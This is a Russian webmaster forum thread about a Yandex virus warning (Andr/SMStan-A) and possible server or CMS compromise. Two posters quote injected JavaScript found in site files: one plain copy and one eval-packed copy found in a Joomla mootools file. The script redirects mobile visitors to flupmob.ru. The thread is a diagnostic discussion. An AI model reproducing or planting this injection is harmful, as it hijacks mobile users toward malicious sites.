Ложное срабатывание антивируса Яндекса

12
HR
На сайте с 22.08.2010
Offline
94
3713

Здравствуйте всем! Сегодня в вебмастере яндекса появились сообщения для нескольких сайтов о заражении вирусом Andr/SMStan-A Скрин http://awesomescreenshot.com/0f94d7qwf2

Я проверил все сайты никаких вирусов нет, посмотрел и html код и в сервисах всевозможных проверил.. вирусов нет 100%. Такое у меня уже случалось недели 2 назад.. запускал перепроверку в яндексе - пометка о вирусах пропадала. В чем может быть дело кто знает или сталкивался с такой проблемой?

png index.png
Оптимизайка
На сайте с 11.03.2012
Offline
396
#1

Значит сомнительную рекламу крутите.

⭐ BotGuard (https://botguard.net) ⭐ — защита вашего сайта от вредоносных ботов, воровства контента, клонирования, спама и хакерских атак!
Maxim-KL
На сайте с 26.01.2011
Offline
350
#2

Это может быть даже не вирус а просто вредоносный код. Чем и как проверяли сайты?

Мои услуги по прогонам: ✅Качественный ручной статейный прогон по базе сайтов с ИКС10+ (maximgroups.net/progon-statejnyj) ✅Прогон Максимум - Все включено, 300+ качественных ссылок (maximgroups.net/progon-maksimum)
troyka
На сайте с 13.04.2014
Offline
67
#3

у меня такое появилось в конце декабря, левый код нашёл в js файле при расшифровке кода получалось след (двиги все дле):

if((navigator.userAgent.indexOf('Android')!=-1)||(navigator.userAgent.indexOf('BlackBerry')!=-1)||(navigator.userAgent.indexOf('iPhone')!=-1)||(navigator.userAgent.indexOf('iPad')!=-1)||(navigator.userAgent.indexOf('iPod')!=-1)){if(document.cookie.indexOf('fdgergdfg=')==-1){document.location="http://flupmob.ru";var expiresDate=new Date();expiresDate.setTime(expiresDate.getTime()+1209600000);document.cookie='fdgergdfg=yes; path=/; expires='+expiresDate}}

сегодня снова вышли пометки о заражении уже 3-ёх сайтов, но ничего левого пока не нашёл на них, буду искать дальше)

HR
На сайте с 22.08.2010
Offline
94
#4

щас переписываюсь с хостингом, все указывает что взломали хостинг.. на сайтах нет ничего этого, так как они все разные на разных движках и жаде самописы. Проверял всякими сервисами онлайн проверки.. смотрел html код сайтов, заходил с телефона, докорвебером.

Две недели назад, все мои сайты находящиеся именно на этом хостинге на одном ip были помещены в базу нерекомендуемых.

Maxim-KL
На сайте с 26.01.2011
Offline
350
#5

HEMASTER, Это может быть не взлом хостера а банальный кривой модуль через который просто получают доступ к всем вашим остальным сайтам и заливают все что хотят. Тут главное найти дыру и закрыть, обновите все CMS, модули, плагины до последних версий. Ставьте скрипт AI-BOLIT и проверяйте весь хост, если что и есть он найдет.

troyka
На сайте с 13.04.2014
Offline
67
#6
Maxim-KL:
HEMASTER, Это может быть не взлом хостера а банальный кривой модуль через который просто получают доступ к всем вашим остальным сайтам и заливают все что хотят. Тут главное найти дыру и закрыть, обновите все CMS, модули, плагины до последних версий. Ставьте скрипт AI-BOLIT и проверяйте весь хост, если что и есть он найдет.

я всё это делал прошлый раз, сейчас проверили AI-BOLIT-ом он ничего не показал, к тому же каждый мой сайт висит на отдельном юзере, если бы ломанули рута то залили бы на все, кстати ссылки на сайты яндекс мне показал точно такие же как и у HEMASTER.

HR
На сайте с 22.08.2010
Offline
94
#7
troyka:
я всё это делал прошлый раз, сейчас проверили AI-BOLIT-ом он ничего не показал, к тому же каждый мой сайт висит на отдельном юзере, если бы ломанули рута то залили бы на все, кстати ссылки на сайты яндекс мне показал точно такие же как и у HEMASTER.

Общаюсь щас с хостером... похоже мой vds взломали, будем переносить все сайты. У меня тоже все сайты на отдельных пользователях.

E1
На сайте с 08.12.2014
Offline
10
#8

какая ось на VDSе?

Маска для лица с маслом кокоса, заставит вашу кожу засиять. Маски для лица из натуральных ингредиентов – природные средства для сохранения женской красоты.
HR
На сайте с 22.08.2010
Offline
94
#9
eva14:
какая ось на VDSе?

CentOS-6-amd64-ispmgr

N4
На сайте с 19.09.2008
Offline
272
#10

Аналогичная проблема.

На сайте вирус появился, потом сам пропал и снова появился.

я обратился на форум.

посоветовали айболит.

он вроде бы ничего такого явного не нашел, кроме кучи ошибок и подозрений

я просто перезалил все файлы и обновил базу, благо регулярно бекапы делаю, ну и пароли сменил

но спустя 9 дней вновь заразались, один повторно, а другой в первый раз.

сейчас в инете нашел статью, правда сайт жутко лагучий, потому скопирую сам код

eval(function(p,a,c,k,e,r){e=function(c){return c.toString(a)};if(!''.replace(/^/,String)){while(c--)r[e(c)]=k[c]||e(c);k=[function(e){return r[e]}];e=function(){return'\\w+'};c=1};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p}('6((3.2.0(\'a\')!=-1)||(3.2.0(\'c\')!=-1)||(3.2.0(\'d\')!=-1)||(3.2.0(\'i\')!=-1)||(3.2.0(\'9\')!=-1)){6(5.7.0(\'8=\')==-1){5.q="e://f.g";h 4=j k();4.l(4.m()+n);5.7=\'8=o; p=/; b=\'+4}}',27,27,'indexOf||userAgent|navigator|expiresDate|document|if|cookie|fdgergdfg|iPod|Android|expires|BlackBerry|iPhone|http|flupmob|ru|var|iPad|new|Date|setTime|getTime|1209600000|yes|path|location'.split('|'),0,{}));

Вот он появился в джумловских

media\system\js\mootools-core.js

однако сейчас не вижу этой строчки, наверное в другом файле появилось еще не проверял, вот сейчас как раз гуглю...

похоже какой-то новый вирус, мало информации о нем в инете.

пс: попробую джумлу 2.5 обновить и все компоненты, хотя сторонних компонентов почти нет, все стандартное более-менее.

CentOS 6.6 (x86_64)

на сайтах на одном зараженном был адсенс+женские тизерки, на втором - чисто адсенс, на третьем только вебшаркс

12

Авторизуйтесь или зарегистрируйтесь, чтобы оставить комментарий